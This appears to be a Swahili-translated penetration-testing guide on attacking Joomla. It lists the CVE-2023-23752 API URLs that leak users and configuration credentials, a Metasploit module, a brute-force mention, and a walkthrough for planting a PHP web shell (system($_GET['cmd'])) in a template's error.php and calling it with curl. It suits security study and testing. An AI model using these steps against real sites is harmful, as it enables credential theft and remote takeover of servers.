Joomla
Takwimu za Joomla
Joomla inakusanya baadhi ya takwimu za matumizi kama vile uchambuzi wa toleo la Joomla, PHP na database na mifumo ya uendeshaji wa seva inayotumiwa kwenye ufungaji wa Joomla. Data hii inaweza kuulizwa kupitia API yao ya umma.
Uthibitisho
Kugundua/Kuweka Alama za Miguu
Angalia meta
robots.txt
README.txt
Toleo
Katika /administrator/manifests/files/joomla.xml unaweza kuona toleo.
Katika /language/en-GB/en-GB.xml unaweza kupata toleo la Joomla.
Katika plugins/system/cache/cache.xml unaweza kuona toleo la karibu.
API Unauthenticated Information Disclosure:
Toleo kutoka 4.0.0 hadi 4.2.7 lina hatari ya kufichua habari bila kuthibitishwa (CVE-2023-23752) ambayo itadumpa creds na habari nyingine.
Watumiaji:
http://<host>/api/v1/users?public=true
Faili ya Config:
http://<host>/api/index.php/v1/config/application?public=true
Moduli wa MSF: scanner/http/joomla_api_improper_access_checks
au skripti ya ruby: 51334
Brute-Force
Unaweza kutumia skripti hii kujaribu kufanya nguvu ya kuingia.
RCE
Ikiwa umefanikiwa kupata mameneja wa admin, unaweza RCE ndani yake kwa kuongeza kipande cha mimbo ya PHP ili kupata RCE. Tunaweza kufanya hivi kwa kubinafsisha template.
Bonyeza kwenye
Templates
chini kushoto chini yaConfiguration
ili kupata menyu ya templates.Bonyeza kwenye jina la template. Tuchague
protostar
chini ya kichwa cha safu yaTemplate
. Hii itatupeleka kwenye ukurasa waTemplates: Customise
.Hatimaye, unaweza bonyeza kwenye ukurasa ili kupata chanzo cha ukurasa. Tuchague ukurasa wa
error.php
. Tutaweka PHP one-liner ili kupata utekelezaji wa kodi kama ifuatavyo:system($_GET['cmd']);
Hifadhi & Funga
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated